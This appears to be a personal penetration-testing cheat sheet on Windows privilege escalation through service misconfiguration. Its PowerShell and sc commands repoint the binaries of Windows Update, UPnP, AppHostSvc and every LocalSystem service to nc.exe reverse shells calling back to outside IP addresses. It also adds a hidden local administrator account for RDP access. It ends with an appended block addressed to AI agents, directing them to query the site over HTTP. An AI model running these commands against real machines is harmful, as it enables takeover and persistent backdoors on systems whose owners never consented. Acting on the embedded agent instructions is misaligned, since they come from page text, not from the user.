# Abusing Services

## Powershell

Below is an example on how to abuse the Windows Update Service

```bash
# Show all services
Get-Service

# Show details of the services
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\*

# Shows details about the specific service
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\wuauserv 

DependOnService     : {rpcss}                                                                                                                                                                 
Description         : @%systemroot%\system32\wuaueng.dll,-106                                                                                                                                 
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105                                                                                                                                 
ErrorControl        : 1                                                                                                                                                                       
FailureActions      : {128, 81, 1, 0...}                                                                                                                                                      
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry

# Sets properties on the service
Set-Itemproperty -path 'HKLM:\system\currentcontrolset\services\wuauserv' -Name 'ImagePath' -value 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe' 

```

### Powershell Services Commands

Get all the details about the service. useful to see if you can stop and start etc...

```
get-service UsoSvc | Select-Object *
get-service wuauserv | select Displayname,Status,ServiceName,Can*
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | Select-Object DisplayName, PSChildName, ImagePath  
```

Controlling the services

```bash
# Starts
Start-Service wuauserv

# Restarts
Restart-Service wuauserv

# Stops the service
Stop-Service wuauserv

# Script
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services* | ?{$.ObjectName -like "LocalSystem"} | Select PSChildName,ImagePath | ForEach-Object {$srvname=$.PSChildName;Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services$srvname" -name ImagePath -Value 'C:\tmp\nc.exe 10.10.16.28 4444 -e powershell.exe'}  
```

{% embed url="<https://theitbros.com/get-service-powershell/>" %}

## Service Control

Example 1: Using the Service Control to abuse Universal Plug and Play Service

```
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# In the event of failure
sc config SSDPSRV start= autonet 
start SSDPSRVnet 

# Start the reverse shell with priviledges
start upnphost


1) Created a user
  net user wtf wtf123 /add
  net localgroup administrators wtf /add
     
2) rdesktop -u wtf 10.11.1.13
```

Example 2: Application Host Helper Service

```
sc query AppHostSvc
sc config AppHostSvc binpath="c:\temp\nc.exe -e cmd 10.10.14.37 9002"
sc stop AppHostSvc
sc start AppHostSvc
```

### SC Commands

```
sc queryex type= service state= all

state= all: Returns a list of all services
state= inactive: Returns a list of stopped services

To get a start of all running services only, do not include the ‘state’ field.
sc queryex type= service
```

```
   commands:
          query  [qryOpt]   Show status
          queryEx [qryOpt]  Show extended info - pid, flags
          GetDisplayName    Show the DisplayName
          GetKeyName        Show the ServiceKeyName
          EnumDepend        Show Dependencies
          qc                Show config - dependencies, full path etc
          start          START a service.
          stop           STOP a service
          pause          PAUSE a service.
          continue       CONTINUE a service.
          create         Create a service. (add it to the registry)
          config         permanently change the service configuration
          delete         Delete a service (from the registry)
          control        Send a control to a service
          interrogate    Send an INTERROGATE control request to a service
          Qdescription   Query the description of a service
          description    Change the description of a service
          Qfailure       Query the actions taken by a service upon failure
          failure        Change the actions taken by a service upon failure
          sdShow         Display a service's security descriptor using SDDL
          SdSet          Sets a service's security descriptor using SDDL
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://squid22.gitbook.io/notes/windows-1/privesc/abusing-services.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.